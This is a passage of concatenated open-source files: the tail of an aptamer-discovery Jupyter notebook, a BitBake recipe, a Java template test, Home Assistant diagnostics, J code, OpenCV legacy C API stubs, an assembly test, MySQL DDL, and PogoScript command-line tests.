"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Figure 2B Raw Data\n",
"pd_input_df.groupby('round2_low_no_serum_flag\tround2_medium_no_serum_flag\tround2_high_no_serum_flag'.split()).count()[['sequence']]"
]
},
{
"cell_type": "code",
"execution_count": null,
"metadata": {
"colab": {
"height": 498
},
"executionInfo": {
"elapsed": 396,
"status": "ok",
"timestamp": 1603828883625,
"user": {
"displayName": "",
"photoUrl": "",
"userId": ""
},
"user_tz": 420
},
"id": "pg5zbUUAdywu",
"outputId": "411ae6ee-7eb1-4bb0-a27d-f1eae398f2ec"
},
"outputs": [
{
"data": {
"text/html": [
"\u003cdiv\u003e\n",
"\u003cstyle scoped\u003e\n",
" .dataframe tbody tr th:only-of-type {\n",
" vertical-align: middle;\n",
" }\n",
"\n",
" .dataframe tbody tr th {\n",
" vertical-align: top;\n",
" }\n",
"\n",
" .dataframe thead th {\n",
" text-align: right;\n",
" }\n",
"\u003c/style\u003e\n",
"\u003ctable border=\"1\" class=\"dataframe\"\u003e\n",
" \u003cthead\u003e\n",
" \u003ctr style=\"text-align: right;\"\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003cth\u003esequence\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eround1_low_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_medium_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_high_flag\u003c/th\u003e\n",
" \u003cth\u003eround1_very_flag\u003c/th\u003e\n",
" \u003cth\u003e\u003c/th\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/thead\u003e\n",
" \u003ctbody\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"6\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e179161\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e2\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e185\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e12\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"8\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e5426\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e3\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e22\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e1\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"4\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eFalse\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e2360\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e15\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth rowspan=\"2\" valign=\"top\"\u003eTrue\u003c/th\u003e\n",
" \u003cth\u003eFalse\u003c/th\u003e\n",
" \u003ctd\u003e276\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003ctr\u003e\n",
" \u003cth\u003eTrue\u003c/th\u003e\n",
" \u003ctd\u003e84\u003c/td\u003e\n",
" \u003c/tr\u003e\n",
" \u003c/tbody\u003e\n",
"\u003c/table\u003e\n",
"\u003c/div\u003e"
],
"text/plain": [
" sequence\n",
"round1_low_flag round1_medium_flag round1_high_flag round1_very_flag \n",
"False False False False 179161\n",
" True False 2\n",
" True False False 185\n",
" True 1\n",
" True False 12\n",
" True 1\n",
"True False False False 5426\n",
" True 3\n",
" True False 22\n",
" True 1\n",
" True False False 2360\n",
" True 15\n",
" True False 276\n",
" True 84"
]
},
"execution_count": 14,
"metadata": {
"tags": []
},
"output_type": "execute_result"
}
],
"source": [
"#@title Figure 2C Raw Data\n",
"\n",
"# To build venn (green), sum preceding True flags to get consistent sets\n",
"# 512 nM = 5426+3 = 5429\n",
"# 512 \u0026 128 nM = 2360+15 = 2375\n",
"# 512 \u0026 128 \u0026 32nM (including 8 nM) = 276+84 = 360\n",
"# To build venn (grey) Inconsistent flags are summed (ignoring 8nM)\n",
"# 128 nM only = 185 + 1 = 186\n",
"# 128 nM \u0026 32 nM = 12+1 = 13\n",
"# 32 nM only = 2\n",
"# 32 nM and 512 nM only = 22+1 = 23\n",
"# \n",
"# To build pie, look at all round1_very_flags = True\n",
"# Green = 84\n",
"# Grey = 15+1+3+1+1 = 21\n",
"mlpd_input_df.groupby('round1_low_flag\tround1_medium_flag\tround1_high_flag round1_very_flag'.split()).count()[['sequence']]"
]
}
],
"metadata": {
"colab": {
"collapsed_sections": [],
"last_runtime": {
"build_target": "//research/biology/alphagenome:alphagenome_colab",
"kind": "private"
},
"name": "Figure 2 Machine-learning-guided aptamer discovery (submission).ipynb",
"provenance": [
{
"file_id": "1awuRoRT0n6iLSMTAH03CSq37KGCWxu2u",
"timestamp": 1603475056932
},
{
"file_id": "1itCfSxMlDDu7xKKROn10EXhWbXdxo1TX",
"timestamp": 1603474788314
},
{
"file_id": "10_qNH-XhiJZMakduzsEXNKEd-DEshYmQ",
"timestamp": 1603357039688
},
{
"file_id": "1pPg_LPXmogMdDy8aAL7E1Hul-jYibALI",
"timestamp": 1603150899877
},
{
"file_id": "1LIbYnfPYSbjPtFZzwtXR6O60QvL4RdO6",
"timestamp": 1603141230651
},
{
"file_id": "16B2JDwBLtT2JOMJGeyla-SjS29bYQgvK",
"timestamp": 1593452704228
},
{
"file_id": "1iXrZrd9UCDJ9oaqBxOC7EHtQpnvhVkW4",
"timestamp": 1593120468277
},
{
"file_id": "1DqHktleGMNONMackZeve8sElQ2fOcFhL",
"timestamp": 1586448562556
},
{
"file_id": "1Dk8MgJu86W_KO8peayyo0Y02pfLkqdqX",
"timestamp": 1583452332056
},
{
"file_id": "1ru5ARNkGB19RTacCND48NJhnR3o2qqNr",
"timestamp": 1582239842118
},
{
"file_id": "1T1XL25bS7L81erHwCzf6HVueqPo42uit",
"timestamp": 1581621943122
},
{
"file_id": "1DQTQ5EmzbqpVflUaCJYZhIKLbxP19x2g",
"timestamp": 1581360733451
},
{
"file_id": "1pIJUGr60UyOf2le4ehPaR2HFDWT7fB3Q",
"timestamp": 1581018638744
},
{
"file_id": "1mpk7R6pNQUD6tdW9aaSt0D784PkVoC5f",
"timestamp": 1580404906728
},
{
"file_id": "1WFx5uXw0gzNEVUFfik9l_Q4zvD1XP7mq",
"timestamp": 1576173640261
},
{
"file_id": "1fFgkqbG8adO4L9rpozRgJ98ClcKwPcbw",
"timestamp": 1566493555486
}
],
"toc_visible": true
},
"kernelspec": {
"display_name": "Python 3",
"name": "python3"
}
},
"nbformat": 4,
"nbformat_minor": 0
}
| Jupyter Notebook | 5 | shaun95/google-research | aptamers_mlpd/figures/Figure_2_Machine_learning_guided_aptamer_discovery_(submission).ipynb | [
"Apache-2.0"
] |
require go-cross-canadian.inc
require go-${PV}.inc
| BitBake | 0 | cmonr/meta-pelion-edge | recipes-devtools/go/go-cross-canadian_1.14.bb | [
"Apache-2.0"
] |
package jadx.tests.functional;
import org.junit.jupiter.api.Test;
import jadx.core.export.TemplateFile;
import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.containsString;
public class TemplateFileTest {
@Test
public void testBuildGradle() throws Exception {
TemplateFile tmpl = TemplateFile.fromResources("/export/app.build.gradle.tmpl");
tmpl.add("applicationId", "SOME_ID");
tmpl.add("minSdkVersion", 1);
tmpl.add("targetSdkVersion", 2);
tmpl.add("versionCode", 3);
tmpl.add("versionName", "1.2.3");
String res = tmpl.build();
System.out.println(res);
assertThat(res, containsString("applicationId 'SOME_ID'"));
assertThat(res, containsString("targetSdkVersion 2"));
assertThat(res, containsString("versionCode 3"));
assertThat(res, containsString("versionName \"1.2.3\""));
}
}
| Java | 4 | Dev-kishan1999/jadx | jadx-core/src/test/java/jadx/tests/functional/TemplateFileTest.java | [
"Apache-2.0"
] |
"""Support for the Airzone diagnostics."""
from __future__ import annotations
from typing import Any
from aioairzone.const import API_MAC, AZD_MAC
from homeassistant.components.diagnostics.util import async_redact_data
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_UNIQUE_ID
from homeassistant.core import HomeAssistant
from .const import DOMAIN
from .coordinator import AirzoneUpdateCoordinator
TO_REDACT_API = [
API_MAC,
]
TO_REDACT_CONFIG = [
CONF_UNIQUE_ID,
]
TO_REDACT_COORD = [
AZD_MAC,
]
async def async_get_config_entry_diagnostics(
hass: HomeAssistant, config_entry: ConfigEntry
) -> dict[str, Any]:
"""Return diagnostics for a config entry."""
coordinator: AirzoneUpdateCoordinator = hass.data[DOMAIN][config_entry.entry_id]
return {
"api_data": async_redact_data(coordinator.airzone.raw_data(), TO_REDACT_API),
"config_entry": async_redact_data(config_entry.as_dict(), TO_REDACT_CONFIG),
"coord_data": async_redact_data(coordinator.data, TO_REDACT_COORD),
}
| Python | 4 | liangleslie/core | homeassistant/components/airzone/diagnostics.py | [
"Apache-2.0"
] |
ic =: 4 : 0
defn =. 'pdefn' conew~ x;y
DU =. get_DU__defn ''
coerase"0 (#~ >:&".&>&defn) conl 1
DU
)
NB. =========================================================
cocurrent 'pcommon'
NB. split into (chars,.prec)
sp1 =: ((,(<-~2),~<)`(}:@[ (,>:&.>) {:@[)@.(' '=])~ ,@boxopen)/@:|.&.(' '&,)
sp =: [: ({."1 ,. [:]&.> _ (_1}) 2 >./\ 0,>@{:"1) _2 ]\ sp1
NB. parse (does not work with parens)
stapply =: 3 (({. (<@|.@[ , [:>.&.>/0 2{])/@:|:@:, }.)@:{. , }.) ]
ifapp =: (-:\:~)@:(,&:({:"1) 2&{.) ` 0: @. (3>#@])
parse =: [: {."1 (([ , stapply^:ifapp^:_) ,:^:(2-#@$))/ &.: ((,:'$';_)&,)@:|.@:sp
NB. give op,args for a function
farg =: 1&{ ,`(|.@])@.((<'.')-:[) 0 2&{
NB. Function notation utils
paren =: '(',,&')'
list =: (,','&,)&.>/(>@:)^:(*@#)
cfun =: , [:paren list^:(0<L.)
apply =: ] cfun~ 'apply',":@<:@#@],'_',[
NB. =========================================================
cocurrent 'pdefn'
coinsert 'pcommon'
NB. ---------------------------------------------------------
NB. y is name;definition
create =: 3 : 0
name =: x [ 'x y' =. y
NB. Parse; split into LHS and RHS
p =. parse y
'Incorrect number of functions' assert 1=#p
p =. >{.p
'Must be an assignment' assert ':'-:1{::p
'L def1' =. 0 2{p
NB. Extract op and args from LHS
op =: >{: L =. <`([: (<@}.,$:@>@{.) farg)@.(1<#) L
L =. }: L
'LHS depth cannot exceed 2' assert 2>:#L
'Repeated args in LHS' assert *./@:~: ;L
NB. Number for use as a suffix
N =: {.@":"0 |. #@> L
NB. Turn LHS arguments into objects
cname =. ; ((] #&.> 'lr'{.~#@[)&.> 1+i.@-@#) L
nval =. ; (]"0&.> 1{.~#) L
vals =: 'pobject' conew"1~ cname ,. nval ;"0 _ ''
getval =: vals {~ (;;L)&i.
defn =: getobj def1
decln =: 0 NB. Number of complex declarations so far (a,b,...)
vars =: 0 2$a: NB. List of variables to declare and free
)
getobj =: 3 : 0
if. 1=#y do. getval y return. end.
'pobject' conew~ 'fn';1;< getobj@> farg y
)
plusa =: 4 :'+&x&.(a.&i.) y'&'a'
newdecl =: 3 :',plusa <:decln =: >:decln'
addvar =: 3 : 'vars =: vars,y'
get_T =: 3 : 0
T =. get_T__defn :: ((<'V')"_) 2
(name ;~ 'return ',,&'; ')`(''&;)@.(0<L.) T
)
get_P =: 3 : 0
e =. {. get_P__defn 2 NB. vars is created as a side effect
f1 =. 4 :'(''FREE''cfun ''P''cfun])`(''ddel''&cfun)@.(nval__x)&.> y'/"1
e =. vars (('V ',[:list{:"1@]) ; (, f1))~^:(*@#@[) e
e =. e , 'del'&cfun&.> ;3 :'<del__y $0'"0 vals
name ;~ ; ,&'; '&.> e
)
get_DU =: 3 : 0
T =. get_T ''
P =. get_P ''
D =. ; 'TP' ('D_',[,N,(paren name),' { ',],'}',LF"_)^:(*@#@])&.> T,&{.P
DBX =. ';',~ 'DB' cfun (N,~tolower@[) ; (qop=.''''(,,[)op) ; ]
U =. ; T ((' ',LF),~&.>'TP' DBX&.> ,)`(LF,~';',~'D'cfun N;qop;])@.-:&{: P
D;U
)
NB. ---------------------------------------------------------
cocurrent 'pobject'
coinsert 'pcommon'
NB. y is name;nval;args
create =: 3 : 0
'name nval args' =: y
coinsert (*#args) { ;:'pvalue pfunction'
)
T =: 'T'&cfun
NB. get_T: y is
NB. 0 if the type is required
NB. 1 if the value is required
NB. 2 if the type is required and the result is output
NB. get_P: y is
NB. 0 if the value will be consumed
NB. 1 if the value will not be consumed
NB. 2 if the result should be stored in p
NB. The value returned is (expression;freename) and any declarations are
NB. added to the pdef object.
NB. freename is empty, or the temp name to use for FREE.
cocurrent 'pvalue'
get_T =: 3 : 'T^:(-.y+nval)`<@.(y=2) name'
Nu =: 0
get_P =: 3 : 0
v =. 0 > nval =: nval - y~:1
nval =: 0>.nval
if. y=2 do.
'' ;~ (v{::'mv_P';'cp_P') cfun 'p';name
else.
if. -.v do. name;'' else. ('cpy'&cfun ; ,&((Nu=:Nu+1)#'_')) name end.
end.
)
del =: 3 : 'nval # <name'
cocurrent 'pfunction'
get_T =: 3 : 0
[:^:(y=1) ''
'T' apply (4 :'<get_T__y x'"0~ 1{.~#) args
)
get_P =: 3 : 0
nval =: nval - y~:1
ord =. 2,}.4 :'name__x-:y'&'fn'"0 args
n=.":<:#g =. (4 :'get_P__y x'"0&.:((|.\:ord)&{)~ 1{.~#) args
'ge gd' =. <"_1|:g
if. y=2 do.
suff =. '_P'
a =. ''
else.
d =. *./ *@#@> }.gd NB. if apply should delete the arguments
gd =. '' ; (-.d) #&.> }.gd
suff =. (#. d,~#@>{.gd) {:: '';'_d';'d';'dd'
a =. newdecl__COCREATOR ''
end.
args addvar__COCREATOR@;^:(*@#@])&> gd
a ;~ ('apply',n,suff) cfun 'p'&;^:(y=2) gd (,'='&,)^:(*@#@[)&.> ge
)
| J | 4 | mlochbaum/ILanguage | ic/ic.ijs | [
"0BSD"
] |
// This file is part of OpenCV project.
// It is subject to the license terms in the LICENSE file found in the top-level directory
// of this distribution and at http://opencv.org/license.html.
#include "precomp.hpp"
#include "opencv2/videoio/registry.hpp"
#include "videoio_registry.hpp"
using namespace cv;
// Legacy C-like API
CV_IMPL CvCapture* cvCreateCameraCapture(int)
{
CV_LOG_WARNING(NULL, "cvCreateCameraCapture doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL CvCapture* cvCreateFileCaptureWithPreference(const char*, int)
{
CV_LOG_WARNING(NULL, "cvCreateFileCaptureWithPreference doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL CvCapture* cvCreateFileCapture(const char * filename)
{
return cvCreateFileCaptureWithPreference(filename, CAP_ANY);
}
CV_IMPL CvVideoWriter* cvCreateVideoWriter(const char*, int, double, CvSize, int)
{
CV_LOG_WARNING(NULL, "cvCreateVideoWriter doesn't support legacy API anymore.")
return NULL;
}
CV_IMPL int cvWriteFrame(CvVideoWriter* writer, const IplImage* image)
{
return writer ? writer->writeFrame(image) : 0;
}
CV_IMPL void cvReleaseVideoWriter(CvVideoWriter** pwriter)
{
if( pwriter && *pwriter )
{
delete *pwriter;
*pwriter = 0;
}
}
CV_IMPL void cvReleaseCapture(CvCapture** pcapture)
{
if (pcapture && *pcapture)
{
delete *pcapture;
*pcapture = 0;
}
}
CV_IMPL IplImage* cvQueryFrame(CvCapture* capture)
{
if (!capture)
return 0;
if (!capture->grabFrame())
return 0;
return capture->retrieveFrame(0);
}
CV_IMPL int cvGrabFrame(CvCapture* capture)
{
return capture ? capture->grabFrame() : 0;
}
CV_IMPL IplImage* cvRetrieveFrame(CvCapture* capture, int idx)
{
return capture ? capture->retrieveFrame(idx) : 0;
}
CV_IMPL double cvGetCaptureProperty(CvCapture* capture, int id)
{
return capture ? capture->getProperty(id) : 0;
}
CV_IMPL int cvSetCaptureProperty(CvCapture* capture, int id, double value)
{
return capture ? capture->setProperty(id, value) : 0;
}
CV_IMPL int cvGetCaptureDomain(CvCapture* capture)
{
return capture ? capture->getCaptureDomain() : 0;
}
| C++ | 4 | thisisgopalmandal/opencv | modules/videoio/src/videoio_c.cpp | [
"BSD-3-Clause"
] |
BITS 32
push eax
hlt
| Assembly | 0 | brenden7158/v86 | tests/expect/tests/push.asm | [
"BSD-2-Clause"
] |
CREATE TABLE `tb_fwnltgnpeg` (
`col_gzxmlukzgv` smallint(169) unsigned zerofill NOT NULL,
PRIMARY KEY (`col_gzxmlukzgv`),
UNIQUE INDEX `uk_gwlvlnvrkh` (`col_gzxmlukzgv`),
UNIQUE INDEX `uk_ygsnwxzroc` (`col_gzxmlukzgv`)
) DEFAULT CHARSET=utf8;
RENAME TABLE `tb_fwnltgnpeg` TO `tb_hmfoniytbf`;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_gxqvwbkvyi` datetime(5);
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN (`col_fthqvynbuq` mediumint unsigned zerofill, `col_dcxnatwddd` date DEFAULT '2019-07-04');
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_wvbemkrzdt` longtext CHARACTER SET utf8 COLLATE utf8_unicode_ci FIRST;
ALTER TABLE `tb_hmfoniytbf` ADD `col_alzezpawqi` longblob;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN `col_tpzhsbkmka` longtext;
ALTER TABLE `tb_hmfoniytbf` ADD COLUMN (`col_urfoabrjor` bit(15) NOT NULL, `col_xreorfbhxc` decimal(35) NULL);
ALTER TABLE `tb_hmfoniytbf` DEFAULT CHARACTER SET utf8;
ALTER TABLE `tb_hmfoniytbf` ADD UNIQUE INDEX `uk_ztdbxlchxi` (`col_alzezpawqi`(18),`col_tpzhsbkmka`(30));
ALTER TABLE `tb_hmfoniytbf` ALTER COLUMN `col_dcxnatwddd` DROP DEFAULT;
ALTER TABLE `tb_hmfoniytbf` DROP COLUMN `col_tpzhsbkmka`, DROP COLUMN `col_dcxnatwddd`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_alzezpawqi`, DROP `col_wvbemkrzdt`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_gzxmlukzgv`, DROP `col_xreorfbhxc`;
ALTER TABLE `tb_hmfoniytbf` DROP `col_gxqvwbkvyi`, DROP `col_fthqvynbuq`;
| SQL | 2 | yuanweikang2020/canal | parse/src/test/resources/ddl/alter/test_8.sql | [
"Apache-2.0"
] |
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 4.233 4.233" height="16" width="16"><path d="M.15 2.992c-.198.1-.2.266-.002.365l1.604.802a.93.93 0 00.729-.001l1.602-.801c.198-.1.197-.264 0-.364l-.695-.348c-1.306.595-2.542 0-2.542 0m-.264.53l.658-.329c.6.252 1.238.244 1.754 0l.659.329-1.536.768zM.15 1.935c-.198.1-.198.265 0 .364l1.604.802a.926.926 0 00.727 0l1.603-.802c.198-.099.198-.264 0-.363l-.694-.35c-1.14.56-2.546.001-2.546.001m-.264.53l.664-.332c.52.266 1.261.235 1.75.002l.659.33-1.537.768zM.15.877c-.198.099-.198.264 0 .363l1.604.802a.926.926 0 00.727 0l1.603-.802c.198-.099.198-.264 0-.363L2.481.075a.926.926 0 00-.727 0zm.43.182L2.117.29l1.538.769-1.538.768z"/></svg> | SVG | 0 | MMeent/pdf.js | web/images/toolbarButton-viewLayers.svg | [
"Apache-2.0"
] |
plot sin(x) with lines
replot cos(x) with lines
| Gnuplot | 2 | Iinguistics/algorithm-archivists.github.io | contents/plotting/code/gnuplot/sine.gp | [
"MIT"
] |
path = require 'path'
fs = require 'fs'
script = require './pogoAssertions'
withArgsShouldOutput = script.withArgsShouldOutput
childProcess = require 'child_process'
net = require 'net'
require 'chai'.should()
describe 'pogo command'
it "`process.argv` contains 'pogo', the name of the
script executed, and the arguments from the command line"
'console.log (process.argv)' withArgs ['one', 'two'] shouldOutput "[ 'pogo',
'#(path.resolve '343111c34d666435dd7e88265c816cbfdbe68cd3.pogo')',
'one',
'two' ]"
it "`__filename` should be the name of the script"
'console.log (__filename)' withArgs [] shouldOutput (path.resolve "5be55a44c52f14d048d19c020fd913199ae2e61c.pogo")
it "`__dirname` should be the name of the script"
'console.log (__dirname)' withArgs [] shouldOutput (path.resolve ".")
it "runs script files even if they don't use the .pogo extension"
'console.log "hi"' withArgs [] shouldOutput 'hi' (scriptFilename: 'ascript')
it "script can take same switches as pogo script, like --compile"
'console.log (process.argv)' withArgs ['--compile'] shouldOutput "[ 'pogo',
'#(path.resolve '343111c34d666435dd7e88265c816cbfdbe68cd3.pogo')',
'--compile' ]"
write (content) toFile (filename) =
fs.writeFile ("#(__dirname)/#(filename)", content, ^)
expandPogoCommand (command) =
if (r/^pogo( |$)/.test (command))
pogo = __dirname + "/../../bin/pogo"
command.replace r/^pogo/ (pogo)
else
command
runShim (command, callback) =
expandedCommand = expandPogoCommand (command)
childProcess.exec (expandedCommand, {cwd = __dirname}) @(error, stdout, stderr)
callback (error, {stdout = stdout, stderr = stderr})
run (command) = runShim (command, ^)
describe 'pogo --compile'
afterEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
it 'can compile a script'
write "console.log 'hi'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -c toCompile.pogo"!
pogoOutput.stdout.should.equal ''
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "hi\n"
nodeOutput.stderr.should.equal ''
(n)ms = n
(n)s = n * 1000
wait (milliseconds) =
setTimeout (^, milliseconds)
unlink (file)! =
try
fs.unlink (file, ^)!
catch (error)
if (error.code != 'ENOENT')
throw (error)
describe 'pogo --help'
it 'prints out help'
pogoOutput = run "pogo --help"!
pogoOutput.stdout.should.match r/usage:/
pogoOutput.stdout.should.match r/--compile/
pogoOutput.stdout.should.match r/--watch/
describe 'pogo --compile --if-stale'
beforeEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
afterEach
unlink "#(__dirname)/toCompile.pogo"!
unlink "#(__dirname)/toCompile.js"!
it 'compiles a pogo script if the js is missing'
write "console.log 'hi'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal "compiling toCompile.pogo => toCompile.js\n"
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "hi\n"
nodeOutput.stderr.should.equal ''
it 'compiles a pogo script if the js is out of date'
write "console.log('old')" toFile "toCompile.js"!
wait (1s)!
write "console.log 'new'" toFile "toCompile.pogo"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal "compiling toCompile.pogo => toCompile.js\n"
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "new\n"
nodeOutput.stderr.should.equal ''
it "doesn't recompile the js if it the pogo is older"
write "console.log 'pogo'" toFile "toCompile.pogo"!
wait (1s)!
write "console.log('js')" toFile "toCompile.js"!
pogoOutput = run "pogo -cs toCompile.pogo"!
pogoOutput.stdout.should.equal ''
pogoOutput.stderr.should.equal ''
nodeOutput = run "node toCompile.js"!
nodeOutput.stdout.should.equal "js\n"
nodeOutput.stderr.should.equal ''
describe 'debugging'
describe '--debug'
this.timeout 3000
it 'starts remote debugging'
write "console.log 'bug!'" toFile "toDebug.pogo"!
pogoOutput = run 'pogo --debug toDebug.pogo'!
pogoOutput.stderr.should.equal "Debugger listening on port 5858\n"
pogoOutput.stdout.should.equal "bug!\n"
describe '`pogo` (interactive)'
util = require 'util'
errorRegex = r/^Error: ((.|\n)*?)\n> > /
pogoSession () =
pogo = childProcess.spawn (expandPogoCommand 'pogo', []) {
cwd = __dirname
stdio = 'pipe'
}
handleResult = nil
currentOutput = ''
firstPrompt = true
pogo.stdout.on 'data' @(data)
out = data.toString ()
currentOutput := currentOutput + out
if (errorRegex.test (currentOutput))
match = errorRegex.exec(currentOutput)
commandErrorOutput = match.1
currentOutput := currentOutput.replace(errorRegex, '')
if (firstPrompt)
firstPrompt := false
else
handleResult (commandErrorOutput)
else if (r/^Error: /.test (currentOutput))
nil
else if (r/^> $/m.test (currentOutput))
commandOutput = currentOutput.replace (r/\n?> $/, '')
currentOutput := ''
if (firstPrompt)
firstPrompt := false
else
handleResult (commandOutput)
pogo.stderr.on 'data' @(data)
console.log 'error'
console.log (data.toString ())
{
issue (command)! =
promise @(success)
handleResult (actualResult) :=
success()
pogo.stdin.write "#(command)\n"
issue (command) andExpect (result)! =
promise @(success)
handleResult (actualResult) :=
if (result :: RegExp)
actualResult.should.match (result)
else
actualResult.should.equal (result)
success ()
pogo.stdin.write "#(command)\n"
exit ()! =
promise @(success)
pogo.on 'exit' @(code)
success (code)
pogo.stdin.end ()
}
it 'evaluates a simple line of pogoscript'
pogo = pogoSession ()
pogo.issue '8' andExpect '8'!
pogo.exit()!
it 'can continue in the face of syntax errors'
pogo = pogoSession ()
pogo.issue 'blah "' andExpect r/Expecting '\('/!
pogo.issue '8' andExpect '8'!
pogo.exit()!
it 'variables are shared among different lines'
pogo = pogoSession ()
pogo.issue 'a = 8' andExpect '8'!
pogo.issue 'a' andExpect '8'!
pogo.exit()!
it 'evaluates async operations'
pogo = pogoSession ()
pogo.issue 'a()! = 8' andExpect '[Function]'!
pogo.issue 'a()!' andExpect '8'!
pogo.exit()!
it 'evaluates async assignments'
pogo = pogoSession ()
pogo.issue 'a()! = 8' andExpect '[Function]'!
pogo.issue 'b = a()!' andExpect '8'!
pogo.issue 'b' andExpect '8'!
pogo.exit()!
it 'evaluates async assignments properly'
pogo = pogoSession ()
pogo.issue 'a ()! = @{ setTimeout (^, 100), t = (@new Date).getTime (), console.log (t), {t = t} }'!
pogo.issue 'b = a()!'!
pogo.issue 'c = b'!
pogo.issue 'c == b'!
pogo.issue 'b = a()!'!
pogo.issue 'c == b' andExpect 'false'!
pogo.exit()!
it 'can require a local file'
write "exports.x = 'x'" toFile "local.pogo"!
pogo = pogoSession ()
pogo.issue 'require "./local"' andExpect "{ x: 'x' }"!
pogo.exit()!
describe 'pogo --promises'
promisesTests (runPogoCommand) =
it 'default is set to none, using the global Promise'
source = "wait () = setTimeout ^ 1!
global.Promise = 'global promise'
console.log ('global promise' == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to bluebird'
source = "wait () = setTimeout ^ 1!
bluebird = require 'bluebird'
console.log (bluebird == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "--promises bluebird promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to something else'
source = "wait () = setTimeout ^ 1!
myPromiseLib = require './myPromiseLib'
console.log (myPromiseLib == Promise)"
write (source) toFile "promiseTest.pogo"!
write 'module.exports = "my promise";' toFile "myPromiseLib.js"!
output = runPogoCommand "--promises ./myPromiseLib promiseTest.pogo"!
output.stdout.should.equal "true\n"
it 'can be set to none, using the global Promise'
source = "wait () = setTimeout ^ 1!
global.Promise = 'global promise'
console.log ('global promise' == Promise)"
write (source) toFile "promiseTest.pogo"!
output = runPogoCommand "--promises none promiseTest.pogo"!
output.stdout.should.equal "true\n"
context 'when evaluating'
promisesTests @(command)
run "pogo #(command)"!
context 'when compiling'
promisesTests @(command)
run "pogo -c #(command)"!
run "node promiseTest.js"!
| PogoScript | 5 | featurist/pogoscript | test/shell/pogoSpec.pogo | [
